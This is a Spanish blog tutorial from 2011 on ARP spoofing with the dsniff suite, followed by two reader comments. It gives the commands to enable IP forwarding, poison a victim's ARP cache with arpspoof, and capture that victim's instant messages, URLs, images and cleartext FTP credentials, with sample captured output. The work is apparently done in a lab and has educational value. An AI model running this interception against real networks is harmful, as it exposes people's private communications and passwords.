16 sept 2011

ARP Spoofing con DSniff

Hola!

Muy buenas a todos/as!

Ya he hablado en otras ocasiones de ARP Spoofing esta vez lo haremos desde Linux además veremos como vamos viendo los datos que vamos capturando.

Yo las pruebas las haré con Bacltrack-R1

Primero de todo miramos si tenemos ip_forwanding habilitado
root@bt:~# cat /proc/sys/net/ipv4/ip_forward0
Habilitamos ip_forwanding
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Ahora hacemos ARP Spoofing
root@bt:~# arpspoof -i eth0 -t 192.168.57.2 192.168.57.141
Hacemos arpspoof poniendo la interfaz, la dirección del router y la ip de la víctima. Podremos ver como va haciendo el spoofing
0:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a90:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a90:c:29:7d:fa:a9 0:50:56:eb:ac:71 0806 42: arp reply 192.168.57.141 is-at 0:c:29:7d:fa:a9
Ahora con msgsnarf analizaremos los mensajes que se emiten por emsanjería instantánea,por IRC etc..
root@bt:~# msgsnarf -i eth0
Cuando la víctima utilice un servicio de mensajería instantánea nos saldrá en vivo que está haciendo:
msgsnarf: listening on eth0Aug 22 18:25:58 IRC *** victima (~victima@CJ-emenrf.user.operador.com) has joined channel #xchatAug 22 18:28:22 IRC OPNNLzerg > victima: VERSIONAug 22 18:28:31 IRC *** victima (~victima@80.174.134.115.dyn.operador.operador.com) has joined channel #soopaAug 22 18:28:38 IRC victima > #soopa: Hi guys
Ahora usaremos urlsnarf para ver las peticiones HTTP que hace el usuario
root@bt:~# urlsnarf -i eth0
Y podemos ver las peticiones que hace el usuario:
urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]192.168.57.141 – - [22/Aug/2011:18:33:31 +0200] “GET http://www.dragonjar.org/ HTTP/1.1″ – - “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/BT5-BT5.R1-1.jpg&w=200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/Seguridad-Facebook.jpg&w=200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2011/08/BackTrack5R1-300×114.jpg&w= 200&h=200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”192.168.57.141 – - [22/Aug/2011:18:33:36 +0200] “GET http://www.dragonjar.org/wp-content/themes/dragonjar.org/thumb.php?src=wp-content/uploads/2010/06/SamuraiWeb.jpg&w=200&h =200&zc=1&q=90 HTTP/1.1″ – - “http://www.dragonjar.org/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
Y ahora con drifnet lo que haremos será recoger todas las imágenes que la víctima mientras va navegando va encontrandoY por último con dsniff capturamos las contraseñas de aquellos servicios en que las contraseñas van en texto plano
dsniff: listening on eth0—————–08/22/11 19:06:24 tcp 192.168.57.148.1157 -> servidor.21 (ftp)USER dragonjarPASS @dragonjar
Y con esto ya hemos trabajado con la suite de dsniff ;)

3 comentarios:

  1. [...] o Marc Rivero nos traía un artículo muy interesante sobre las distintas herramientas de la suite Dsniff. Todo un placer tener un colaborador tan importante para nosotros, esperemos que te haya gustado la [...]

    ResponderEliminar
  2. Hola, muy bueno el manual, he conseguido que funcione todo salvo urlsnarf, hago lo siguiente:$urlsnarf -i wlan0 (mi interfaz claro esta)$urlsnarf: listening on wlan1 [tcp port 80 or port 8080 or port 3128]$como ves en cuanto le doy me pone q esta escuchando pero no ejecuta nada mas el programa. Alguna idea de porque pasa esto, gracias

    ResponderEliminar